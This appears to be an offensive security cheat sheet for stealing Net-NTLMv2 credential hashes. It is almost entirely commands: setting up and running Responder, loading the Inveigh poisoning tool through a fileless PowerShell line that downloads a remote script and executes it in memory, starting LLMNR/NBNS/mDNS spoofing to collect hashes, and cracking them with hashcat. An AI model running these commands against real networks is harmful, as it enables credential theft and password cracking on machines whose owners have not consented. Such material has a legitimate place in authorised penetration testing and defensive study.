PRIMARY CATEGORY → NTLM
Theory
An operator could force or coerce a remote machine to authenticate against a rogue server controlled by himself in order to grab the corresponding Net-NTLMv2 hash within the NTLM Message Type 3
Abusing from UNIX-like
Responder
Setup
git clone https://github.com/lgandx/Responder Respondercd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txtUsage
python3 Responder.py --interface <INTERFACE>Abusing from Windows
Inveigh.ps1
Setup
- Fileless
IEX (New-Object Net.WebClient).downloadString('https://github.com/Kevin-Robertson/Inveigh/raw/refs/heads/master/Inveigh.ps1')- Touching Disk
IWR -UseBasicParsing -Uri 'https://github.com/Kevin-Robertson/Inveigh/raw/refs/heads/master/Inveigh.ps1' -OutFile '.\Inveigh.ps1'Import-Module .\Inveigh.ps1Usage
- Interactive ( 2 ) or remoteInteractive ( 10 ) Logon Session
e.g. Physical Access ( 2 ), RDP ( 10 )
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y- Network Logon Session ( 3 )
WinRM, Reverse Shell, SMB…
Start Server
Invoke-Inveigh -ConsoleOutput N -LLMNR Y -NBNS Y -mDNS YCheck Status
Get-Inveigh -StatusRetrieve Net-NTLMv2 Hashes
Get-Inveigh -NTLMv2Stop Server
Stop-InveighInveigh.exe
.\Inveigh.exeCracking Net-NTLMv2 Hashes
Hashcat
Hashcat Type → 5600
See here
hashcat --force -O --attack-mode 0 --hash-type 5600 <HASH> <WORDLIST>hashcat --force -O --attack-mode 0 --hash-type 5600 <HASH> <WORDLIST> --show